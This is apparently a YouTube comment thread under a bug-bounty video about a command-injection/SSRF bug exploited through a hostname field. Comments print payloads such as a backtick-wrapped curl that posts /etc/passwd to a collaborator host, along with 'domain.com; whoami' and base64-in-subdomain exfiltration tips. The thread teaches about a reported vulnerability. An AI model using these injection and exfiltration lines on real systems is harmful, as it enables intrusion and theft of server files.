great video! If you already have access to your target, do you also look for privilege escalation to receive more bounties or do you think your work is done after initial access?
@@thehackerish hey bro your work is good u help us learn but can you please show example of request and how you add command injection since i find it harder ot do you put commands then dot burpcollaborator without quotes to the burp addrress???
Isn't this more similar to just plain command injection? I get that it was making requests to a server but SSRF usually accesses internal services eg a Redis database which I'm sure you could have done but injecting a command into what I assume is them running a curl command on the backend seems more similar to just plain old command injection. This isn't really a usual scenario that you would encounter.
Yeah I agree on the command injection point, but the first impression you get is that it is a SSRF. However, you'd be surprised how devs can be careless, especially with deadlines and complicated architectures, so I wouldn't rule this technique out of my daily tests :)
This is stunning :o were the payloads are shown in the video the used or you just wrote them for explaination ?? if none please share'em wih resources & thanks a lot
Great find! I've subscribed. The slide at 6:09 has "mycollab-server" twice. `curl -F ‘@/etc/passwd’ mycollab-server`.mycollab-server Do I understand correctly that you need to have it twice so that the .mycollab-server string at the end conforms it to what looks like a valid host name? If this is the case will your server receive two requests out of that one payload? and could the second "mycollab-server" just as well be example.com or anything else?
You have a sharp eye, Great question! Since the content of passwd does not comply with a hostname name, the request will not be performed. However, the first one will exfiltrate the passwd to your server, which could be anything else as long as it is reachable from the internet. If you want to receive the content in the subdomain part, you could base64 encode the file content, or a part of it.
Hey nice video ! I'm wondering, if you have enter: 'domain.com; whoami' for the command injection part, it would've worked too right ? Or did they sanitize input weirdly ? Thks
So presumably, the host name you provided was run with a shell command - something like curl. Why would they choose to do that instead of making the request within the program (like with Axios if they're using Node backend)
Please share how to use ACUNETIX results to exploit found vulnerabilities like SQLI XSS XSRF LFI RFI etc...bypassing WAF IDS IPS, Hash Recognition, Hash Cracking, Finding Hidden Admin Panels, bypassing admin panel or C-panels, Uploading Shell, Remote code execution-RCE, Rooting Web Server, Gain Root preveliage, Mass Defacement, Maintaining Back door, etc...
@@thehackerish Yes exactly...no problem at all brother...teach us with any available tool script as per your convenience...you are excellent but I am very week in website hacking n website bug bounty hunting field as most of RUclips videos are just basic...not practical n easy to understand....You are the best teacher...May God bless you for your efforts and help 🤝❤💙💚🌹💐👍
@@thehackerish what if the input accepts anything after prefix only? I mean if no it throws an error..any bypass for exfiltrating metadata? (#blindssrf)🙂
That's effin' diabolical mate. Great explanation! Really enjoying your channel.
That's a great find.. learned something new today.✌️
Happy to hear that!
@@thehackerish example where do u put commands outside the the quotes of server address or??
Was simple, but never thought about it. Thanks for it!
Happy to help!
I love this Channel, he does very elegant, explicit demonstration, hope u post more videos on ssrf and xss
Thank you!
Hi! Thanks for the awesome content.
Thank you brother. You and your channel is world best channel who teaches noobes from 0 2 h3r0. Love U Respect U Salute U 🤝❤💙💚💐👍
Oh! What a kind comment! I am humbled, Enjoy!!!
Marvelous explain 👍 keep doing, bro
Great video, thanks for sharing 👍
Thanks for the visit!
great video. thank you very much for the content and the teaching
Thank you for your kind feedback, Enjoy!
great video! If you already have access to your target, do you also look for privilege escalation to receive more bounties or do you think your work is done after initial access?
Great question. I reported it and asked them if they want me to escalate my privileges, but they preferred to quickly fix it.
@@thehackerish thanks for the quick reply. Good idea to first ask for permission :)
@@thehackerish hey bro your work is good u help us learn but can you please show example of request and how you add command injection since i find it harder ot do you put commands then dot burpcollaborator without quotes to the burp addrress???
Learn something new methodology thank for the amazing vedio 😍
My pleasure 😊
Wow Great Suff 👍👍
Thank you!
Great explanation!!
Glad it was helpful!
You are amazing man. Love yaa ❣️
Isn't this more similar to just plain command injection? I get that it was making requests to a server but SSRF usually accesses internal services eg a Redis database which I'm sure you could have done but injecting a command into what I assume is them running a curl command on the backend seems more similar to just plain old command injection. This isn't really a usual scenario that you would encounter.
Yeah I agree on the command injection point, but the first impression you get is that it is a SSRF. However, you'd be surprised how devs can be careless, especially with deadlines and complicated architectures, so I wouldn't rule this technique out of my daily tests :)
Super Amazing! Thankyou! :)
Enjoy!
This is stunning :o
were the payloads are shown in the video the used or you just wrote them for explaination ?? if none please share'em wih resources & thanks a lot
the injection was the same. Just replaced the long collaborator URL with a short one for visual purposes.
@@thehackerish wow, that's really cool, Thanks for your replies and the (very) awesome content :)
@@adamproof3440 My pleasure! Thanks for your kind comment!
Great
Great Finding ! congrats
Thanks!
Great explaination...plz include screenshots for this type of content
It's meant to be a sleep story ;) Just kidding.
Really mindblowing ,owwssaaammmmm
Thank youuuu
Best Hacker ...
Thank you so much bro ❤❤
My pleasure!
really interesting video
Glad you liked it
Great find! I've subscribed. The slide at 6:09 has "mycollab-server" twice. `curl -F ‘@/etc/passwd’ mycollab-server`.mycollab-server Do I understand correctly that you need to have it twice so that the .mycollab-server string at the end conforms it to what looks like a valid host name? If this is the case will your server receive two requests out of that one payload? and could the second "mycollab-server" just as well be example.com or anything else?
You have a sharp eye, Great question!
Since the content of passwd does not comply with a hostname name, the request will not be performed. However, the first one will exfiltrate the passwd to your server, which could be anything else as long as it is reachable from the internet.
If you want to receive the content in the subdomain part, you could base64 encode the file content, or a part of it.
@@thehackerish I get it! Thanks for your fast reply here almost a year after you posted it.
Brother you teaching is nice . But teach with some examples of site or with vulnerable site. we can understand clearly 🤝
Head over to the other playlists (web hacking training and live hacking sessions)
practical part for this vuln using your lab setup? wink-wink :D
;) ;)
i dont understand how hackers can think payload like `command`.collaborator.url
we really need so much creativity to be a hacker?
think like a developer :) You can also build some software to get used to it!
@@thehackerish i dont know how to do that im completely lost the way
@@adtiyamuhammadakbar2711 there are many videos teaching how to build a web application :)
`command`.collaborator.url >>>> URL NOT VALID ERROR😒
Can you upload a practical video on it ???
When I have time, I can prepare a lab for it.
Thank you
SSTI - RCE tutorial :)
I d’ont understand why the server execute the command when you put ‘ in the url, it is standard ? Thx by advance
it's one of the ways to execute commands in Linux.
Sir can you tell me how did you know that your command would work if you put it in subdomain part?
I didn't! Hacking is all trial and error, reflex from experience, and some luck as well :) Just keep reading blogs, and learning new things.
@@thehackerish can i know the name of the exploit im interested in reading about it
@@antimatter6728 You mean CVE? I haven't filed one. But it's a command injection / SSRF vulnerability.
subbed.
Welcome to the club!
@@thehackerish thanks!
How much bounty you got for this?
It says it in the title. 4k
@@thehackerish sorry bro i don't focus that !
Hey nice video ! I'm wondering, if you have enter: 'domain.com; whoami' for the command injection part, it would've worked too right ? Or did they sanitize input weirdly ? Thks
I think it would work. Actually, I might have used it to chain multiple commands, I don't remember exactly though.
Nice work
Note:
‘pwd’.mycollaborator-url
Will be needed to locate the users home folder 📁 path 🤔
As it was a service, that didn't show /home/xxx, but nice idea as well.
`hi`
So presumably, the host name you provided was run with a shell command - something like curl.
Why would they choose to do that instead of making the request within the program (like with Axios if they're using Node backend)
Good question! They were not using using any framework and the dev made the mistake of trusting the hostname during a ssh command.
Please share how to use ACUNETIX results to exploit found vulnerabilities like SQLI XSS XSRF LFI RFI etc...bypassing WAF IDS IPS, Hash Recognition, Hash Cracking, Finding Hidden Admin Panels, bypassing admin panel or C-panels, Uploading Shell, Remote code execution-RCE, Rooting Web Server, Gain Root preveliage, Mass Defacement, Maintaining Back door, etc...
Would love to, but I am not familiar with acunetix scanner. It should be similar to BurpSuite Pro I guess.
@@thehackerish Yes exactly...no problem at all brother...teach us with any available tool script as per your convenience...you are excellent but I am very week in website hacking n website bug bounty hunting field as most of RUclips videos are just basic...not practical n easy to understand....You are the best teacher...May God bless you for your efforts and help 🤝❤💙💚🌹💐👍
Want to be ethical hacker then enrooll thehackerish❤️
Thank you!
Loved it..! thanks🤘
@@thehackerish what if the input accepts anything after prefix only? I mean if no it throws an error..any bypass for exfiltrating metadata? (#blindssrf)🙂
@@chaitanyacse3332 In this case you can still do `inject here`.collaborator.. since this story is basically a command injection.
@@thehackerish tried the same too but its not accepting `` these quotes. Any other bypasses 😉